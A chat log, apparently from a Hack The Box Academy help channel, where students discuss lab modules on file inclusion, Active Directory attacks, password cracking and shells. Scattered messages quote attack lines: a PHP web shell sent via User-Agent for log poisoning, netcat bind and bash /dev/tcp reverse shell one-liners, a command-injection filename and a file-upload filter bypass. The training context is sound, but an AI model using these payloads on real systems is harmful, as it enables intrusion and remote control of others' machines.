i can get the passwd file
nothing else though
Are you sure the server is apache2 and not something else?
what else could it be?
another very popular web server
yeah i found out its Nginx
I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?
also it seems to block the <?php system($_GET["cmd"]); ?>
the log files
Hi there everyone!
I have a couple of questions regarding the imap/pop3 footprinting assessment
I have completed all the questions successfully but I am not sure I understand some of the commands I used
For example 1 fetch <Id> which is detailed in the module of HTB what is Id exactly? Searching the web I used ||1 FETCH 1 Rfc|| and it worked once logged in the server but don’t exactly find out why?
If anyone could briefly explain I would appreciate that
Dm
No it doesnt, you dont have to poison nginx logs.
Hi everyone I am doing the Windows Priv Esc Module and got stuck trying to crack a NTLM hash. Can someone give me a nudge?
use JOHN
@summer lava I tried using John with the rockyou list to no avail
@summer lava Bruteforcing the NTLM hash takes too long ...
i solved it by poisoning nginx logs, but there are certainly other ways
Directly not,|| i poisoned self environ ||
Hey, I'm struggling in the Documentation and Reporting module, the skills assesment, could anyone help?
||john -w=/../../../../rockyou.txt hash.txt|| Should work so find, if not what module is that ?
@summer lava I'm in Windows Privilege Escalation on https://academy.hackthebox.com/module/67/section/606
@summer lava Thank you for your assistance. copied the hash values wrong. My bad
🤏 You're welcome.. always be watchfully... In hacking you have to turn every single stone that you can lift without crashing it.. no noise
ay sir
what is the command you're usin and from which location are u running it?
i ran responder on the linux machine that we have access without success, grabbed IPs with fping, scanned them with nmap, used kerbrute to find 57 valid usernames and tried some passwords with a valid username with crackmapexec, enum4linux didn't gave me anything
and i can't get password policy with tools such as ldapsearch or rpcclient
Haha, literally the same thing just happened to me. It didn't work, then I wen here looking for answers and I found yours. I respawned the machine and just repeated the exact same thing I did before (which didn't work) and all of a sudden it works like a charm...
i used responder -I ens224
from the linux machine on the domain
same but nothing went
o.O whaat
it ran like 15min
so i ran responder and got a hash that i used hashcat on w/mode 5600
that's what comes out
idk how
yeah that's what i expected
it's ||spoiler||
i just delete it nbd u seen it
fresh 🙂
I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?
Do you still need help with this?
help por favor
yes directly, you can use user agent for example
help por favor it for the simply answer in htb academy
Can someone tell me where I can find sweet potato.exe or how to compile it into executable pls
i am stuck on the skills assesment on the lfi module https://academy.hackthebox.com/module/23/section/513 i have gained lfi but can't gain rce
For AD enumeration & attacks assessment part 2, submit the flag in the administrators desktop on the sql01 host, should we be able to connect to it with mssqlclient.py?
I'm working my way through the Bash scripting module (module 21) and have the question Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,469 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
script removed
What is wrong with this? I am getting no output
*edit The question is WRONG, it is not more than 113,469 characters!
may i ask how because i have used burp suite and curl -s '/ilf_admin/index.php' -A '<?php system($_GET["cmd"]); ?>'
Hi, i'm actually doing the PASSWORD ATTACKS module and i'm blocked on the question " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer. " i used the resources zip like they said. i tried different way but still got no result. may be i'm doing something wrong but can't tell what.
i moved on and trying to find how to use the 2nd user we found
DM
Yea
I’m trying to connect from the Linux host they provide but getting a “login is from an untrusted domain” error, when i try to use mssqlclient
This worked. Thanks, I’ve been stuck on this all day
Glad to help
Can somebody please help me ?
Iam stuck at the "Command Injection Skills Assessment"
I already found the injection point and i just get a "Permission denied"
@shadow willow DM me 🙂
where is locate the wordlist with dirb i don't find
it is empty
when i go /usr/bin/wordlist
@knotty summit its not here?
no i don't have the file dirb
what happens if you run: locate dirb
it empty
you can find the dirb wordlists on github if you need them
i don't know how download the complete wordlist
dirb is a directory „/usr/share/wordlist/dirb“
which wordlist do you mean ?
the whole wordlist
i don't have access to dirb
i have install dirb but i don't have the complete repertory
only /usr/share/wordlist/
did you tried
cd /usr/share/wordlists/dirb/
ls
?
sudo apt install dirb
cd /usr/share/wordlists/dirb/
i tried it out it works
I've already done ok it is a mystery
i don't understand why i don't have the repertory dirb
which Distro do you have ?
kali
Shells and Payloads -> The Live Engagement, final host. Little stuck, enumerated and gained access via web shell to a user account but not sure how to escalate privileges. Tried the exploit it recommends too, fails. A hint or push in the right direction would be appreciated!
Hello, I have the Flag for one of the academy moduels i found but its not working idk
How did you find the file to use for this? I cracked it with hash cat was just wondering how this method works tho.
What Module and section?
Enumerate the hostname of your target and submit it as the answer. (case-sensitive) I got the HTB {answer}
but it isnt working
should say at the top of the page
network enumeration
You have to use nmap to scan your target machine
its not in /usr/bin/ its in /usr/share/wordlists/
/usr/share/dirb/wordlists on my kali box
dirb before wordlists ?? thats really odd
Yeah, that's probably why they had trouble finding it!
so you dont have /usr/share/wordlists?
it was installed by default in all my vms
So you know I'm not making things up!
lol I believed you just not sure why you had to install it to begin with
I didn't it was already there
quite a very funny question
why is that?
I have a question for the Attacking Common Services Lab - Easy. Would someone be able to assist please?
wow!! I just looked and have a dirb folder in /usr/share as well. but in wordlists there is a dirb folder with lots in it.
More than this then?
```
──(kali㉿kali)-[/usr/share/dirb/wordlists]
└─$ tree
.
├── big.txt
├── catala.txt
├── common.txt
├── euskera.txt
├── extensions_common.txt
├── indexes.txt
├── mutations_common.txt
├── others
│   ├── best1050.txt
│   ├── best110.txt
│   ├── best15.txt
│   └── names.txt
├── small.txt
├── spanish.txt
├── stress
│   ├── alphanum_case_extra.txt
│   ├── alphanum_case.txt
│   ├── char.txt
│   ├── doble_uri_hex.txt
│   ├── test_ext.txt
│   ├── unicode.txt
│   └── uri_hex.txt
└── vulns
    ├── apache.txt
    ├── axis.txt
    ├── cgis.txt
    ├── coldfusion.txt
    ├── domino.txt
    ├── fatwire_pagenames.txt
    ├── fatwire.txt
    ├── frontpage.txt
    ├── hpsmh.txt
    ├── hyperion.txt
    ├── iis.txt
    ├── iplanet.txt
    ├── jboss.txt
    ├── jersey.txt
    ├── jrun.txt
    ├── netware.txt
    ├── oracle.txt
    ├── ror.txt
    ├── sap.txt
    ├── sharepoint.txt
    ├── sunas.txt
    ├── tests.txt
    ├── tomcat.txt
    ├── vignette.txt
    ├── weblogic.txt
    └── websphere.txt
3 directories, 46 files
```
I haven't needed to use it yet, so I'm not sure if there is more I might need to get from somewhere
they are identical directories
I am working on DNS Enumeration Using Python , when I finish the script it taught and run it, it raise the error : Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 982, in nameservers
raise NotImplementedError
NotImplementedError why does it happened?
even in my parrot vm I have 2 identical dirb directories
Are they actually different folders or is one a symbolic link to the other?
try adding -i to the ls commands and see if the inodes match
they do
A looks like they are linked then
So they are not actually different files, but 2 different paths that point to the same files
I am having trouble with this question.
"To get the flag, start the above exercise, then use curl to download the file returned by 'download.php' in the server shown above."
I have been doing:
cURL -O IP:Port/download.php
How do I find the flag after that?
if you are on section HyperText Transfer Protocol module Web Requests then don't use -O try with just curl IP:Port/download.php
Omfg you are a saint
nope i'm sus
looking at the code it looks like one of the nameservers being passed to it is not using TLS (https), I don't have time to dig into the code now though
Hey i wonder if anyone could help with the Active Directory LDAP module , the question What is the domain functional level?, I really don't know why my answer its not correct, i am using the same tools.
Edit: I found the answer, I really consider you may update that module, its very expensive , and the commands you put there are for the old version python2 from Windapsearch.
Can I get a hand with Broken Auth -> Predictable Reset Token?
I think I'm supposed to generate a token using the same timestamp as htbuser, but changing the username to make the token for htbadmin instead
When I find the timestamp for the token used in htbuser, it doesnt work for htbadmin
Am I misreading the question?
didn't both of the highest ports are refuse to connect? Network issue. Working after reset machine
I impersonate to that right user(previous question). But couldn't run EXECUTE sp_configure 'show advanced options', 1
EXACTLY MY POINT...
why I'm not able to do that if I'm already holding the role sysadmin
related to this one? https://stackoverflow.com/questions/28794079/windows-administrator-doesnt-have-permission-on-sql-server
tried ALTER DATABASE [yourDB] SET TRUSTWORTHY ON; not working either
Have you found the linked DB server?
||LOCAL.TEST.LINKED.SRV||
Login failed for user 'NT AUTHORITY\ANONYMOUS LOGON'.
Have you found a solution?
Otherwise DM me
for DnsAdmins module?
Hello
👋
dm if you're still stuck - this was a really brutal module
hey can somebody help me out with the Local File inclusion skill assessment?
i've found the admin panel and i have access to the access.log file
i tried log poisoning i found that i can inject some text but not the cmd command
Have you tried to install a webshell via the || User-Agent ||?
Yes i tried it
hey I have found the solution. The issue was with my cmd command when I tried to install the webshell
thank you
Did you find a solution to this? As a DotNet developer I use SqlServer in a docker container. If this is the case for machine have you looked at the default creds that they posted on the docker official image page?
Can someone help me in the ACL abuse Tactics section in the Active directory enumeration and attacks module
@rustic sage feel free to DM 🙂
Can someone nudge me in the right direction to get user hash for Active Directory skills II question 10 I am running inveigh from ms01 but gets nothing
hello! I am stuck on the same point Is there any chance could you help me?
Any Tmux users here? I have a question about how to do something
@light yacht i might be able to help!
I can try answering your question
Thank you so much ! May I dm you ?
can you help me with this? every time inject the php code, the user agent doesn't get logged and nothing after that curl request gets logged either.
sure
can anyone give me some help on Web Attacks Bypassing Encoded References ? I'm not getting a post request nor a modifiable variable when I intercept with Burp.
@night pier i might be able to help 🙂
Yes i believe that's the section we were speaking about
Can anyone help me pls with "File Upload Attacks" Whitelist Filters ? 🙂
I uploaded my script with for example (shell.php%00.jpg) but i cant find it <.<
profile_images
yeah thank you ..
But i have a other problem 😄
if i upload something like this:
testpic23.php/x00.png
And the server says "successful uploaded"
That would mean that i can find it with
profile_images/testpic23.php
Or am I wrong?
I can help you
you have to look for the whole file name
yeah but if i search for it i get a 404
can anyone point me in the right direction for the Bypassing Encoded References module?
Good evening can I get some help on the: Information Gathering: Web Edition (module) --> Active Subdomain Enumeration ---> What is the FQDN of the IP address 10.10.34.136?
can anyone help me with this, I got the cubes but in a rude way. I think there's a better way for this
Cheers, was just misunderstanding the question, got it in the end though
I'd say keep looking at other filenames rather than fixating on one that seemed to work
I have the flag 😁
Good stuff
I had thought far too complicated even though the answer was so easy
@wind plaza sec i will DM you 🙂
yo can i dm u i have a question
sure
Happens to me all the time too 😵💫
If you do a zone transfer on inlanefreight you will see a bunch of sub domains. Do a zone transfer on those until you find the one with the info you need
do u have to do htb boxes to change the color of your discord name?
I think you can also do the challenges
Just need to do something that gets you score
ok tnx
Solving active challenges and machines will contribute to your rank in HTB, will subsequently change your Discord colour AFAIK.
anyone to offer help Active Directory skills 2 #10?
what was the question ?
crack the users password
was trying to figure out how to get Inveigh to work
was cumbersome but got it from SQL01
Thank you John, I found the solution. The random things on stackoverflow that I tried are not the case. Have to go into another linked service instead
@normal laurel ya dawg i got u 🙂
Hey silly question here but for the SMTP footprinting section it says to use the provided wordlist to get the username. My issue is I haven’t a clue where that is. Would anybody mind telling me where it might be lmao
@pure silo check the Resources at the top of the page
lol np
Hello, I'm new, and honestly I don't know much about programming, and I need to know what to start with and what things are important to know, could someone help me to guide me?
I think the intro to information security is a good starting point
and i have troubles to download the vpn in the page
wdym, from the page lol
weird
why would it say unavailable
are u being blocked
do u have permission to download it in that location?
idk
i think so
well any ss?
ss?
screenshot
Hi all, I'm on Windows Privilege Escalation Skills Assessment 1 and have managed foothold and root... but for the life of me cant find ldapadmin password. Any hints?
i elevated my priv first then got from lazagne
cheers, I'll give that a go
nice, thanks mate, that worked! I shoulda known to do that lol
hi
Hi
yay I actually fixed the problem 🙂

can anyone help me, i'm new? how should i connect in the linux fundamentals modul with ssh when htb won't tell me any ip adress?
i only now user and password
*know
click here to get the ip
ah okay ty srry for bothering u@vital adder
Hi!!! I’m at the MySQL footprinting last question
I understand what I have to do
But when I try to get to the database of the target ip
I’m getting an error related to my.cnf options
I have cat the file
But I’m not sure what I need to add/change to make possible the command for the target ip
Can anyone help?
This is the sS
Thanks!
Hey for the information gathering - web edition module I have this question: Enumerate the target and find a vHost that contains flag No 1.
I try to enumerate with ffuf but I get 1907 results how can I know where are the flags ?
I’m doing this command btw: ffuf -w namelist.txt -u http://10.129.42.195 -H HOST: FUZZ.www.inlanefreight.htb -fs 612
Hey guys, can I DM someone for Windows Privilege Escalation Skills Assessment - Part I. I feel dumb...
@maiden field try to get content-length using curl
I don’t understand how to do this
use gobuster vhost mode
You can do it this way
curl -s -I http://10.10.10.10 -H "HOST: domain.tld" | grep "Content-Length:"
oh that seem like a better way to do it
I learned this trick in the Attacking Enterprise Networks module 🙂
Ok thanks it give me a content-length but what am i suppose to do with this information ?
I’m sorry if my question is dumb but this module is really unclear for me
You can use it to filter by content-length.
ffuf ... blah ... -fs <Content-Length>
Oh
I see
But it give me no answer
Forgot about that
I did an error it work
Thanks a lot
what are u struggling with?
htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | sudo nc -l 10.129.201.134 443 > /tmp/f
└─$ nc -nv 10.129.201.134 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connection refused.
Please what could be the reason.. i'm trying to get a bind shell
i'm doing the password attack module and i'm running hashcat on unshadow file. it's like 30min/1h that i ran the cracking and it's only at 8%. am i missing something ?
Does it seems like i'm been blocked by firewall or something ?
the second command shouldn't be a listener ?
Like this ?
htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | sudo nc -nv 10.10.15.99 443 > /tmp/f
└─$ nc -lnvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
I have some questions about the "ACL Enumeration" part of Active Directory Enumeration & Attacks, if anyone can help me ?
because i have tried it.. i wasn't getting anything
u can try a basic :
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
but why are u trying to get a reverse shell on a machine that u already have a shell ?
i ssh'ed to the machine and then trying to get a bind shell
SHELLS & PAYLOADS module
it's asked ? bcs ssh connections are more stable than a reverse or bind shell
SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.
if it's a bind shell i think that u can use a basic "nc IP PORT" on ur machine and an "nc -lvnp PORT" on the ubuntu
i got the flag using just the ssh.. but i'm trying to get the point about bind shell
let me try it
that's just it.. THANKS MAN
For anyone that's completed the AD module... the summary says 7 days, curious to know how long it's actually taken people.
i think i managed to finish it in under a week , i had a decent amount of help though 🙂
someone can help me on password attacking module ? cracking take forever idk if i'm doing something wrong
@grave dust i might be able to help
i think i found the trick, no need to use rockyou but the wordlist isn't really the one given...
attacking common services dns section anyone help? i found some sub domains but cant transfer on them
@native comet DM me 🙂
is this normal ? shouldn't i need to be able to connect on the db ?
Hello everyone .. any one can help please ? Regarding bypassing security filter HTTP verb tampering
try doing ||-u jason instead of -u root :)||
There are a few more steps before we get root
i've done it but without "-p" i feel dumb
Question saying ,, To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./
oh yea we need -p to make it prompt for password
make sure you are ||Right-Clicking in burpsuite and changing the request method that way :)||
I tried burp changed methods but not getting any back
Did you right click or just change GET to POST by typing it in?
sec i'll DM
K
no
Hey! Can someone help me with the Bruteforcing Cookies module : Question#2 . "Login to the application using the remember me token". I have the HTBPERSISTENT cookie but can just not figure out how to decode it
@lyric echo url>base64
Thanks, I did try that combo as I seen the % in the original cookie. When I get the result, starting with an 'X', Im unsure if that is the right path or what im missing . following the Base64, I have tried combos of ROT, HEX, etc..
Don't have academy access, but what is the cookie?
Also, thinking of signing up for academy... just how many modules are there in total?
you might have to break it apart at the colon
58 that I count
I would say its definitely worth. There are a pretty big amounts of modules and paths.
ahhh ok, I did not try that. thanks!
How much would it cost in total to do everything? I see that there are 11 fundamental, 16 easy, 28 medium, and 3 hard modules, but the website talks about pricing for module tiers instead.
Maybe I should just go and create an account to check things out.
@lethal atlas do you mean separate the cookie from the colon following HTBPERSISTENT? or using a decoder delimiter of colon?
I have a student account which gets me up to tier 2. I recommend starting with free account and see if you even like the modules.
Need help with module Broken Authentication and its skill check. Found ways to enumerate usernames, and the hint about country codes. No luck finding anything. Put down some serious effort into the remember-me token, no luck. Can anyone help point me in the right direction or give me a hint?
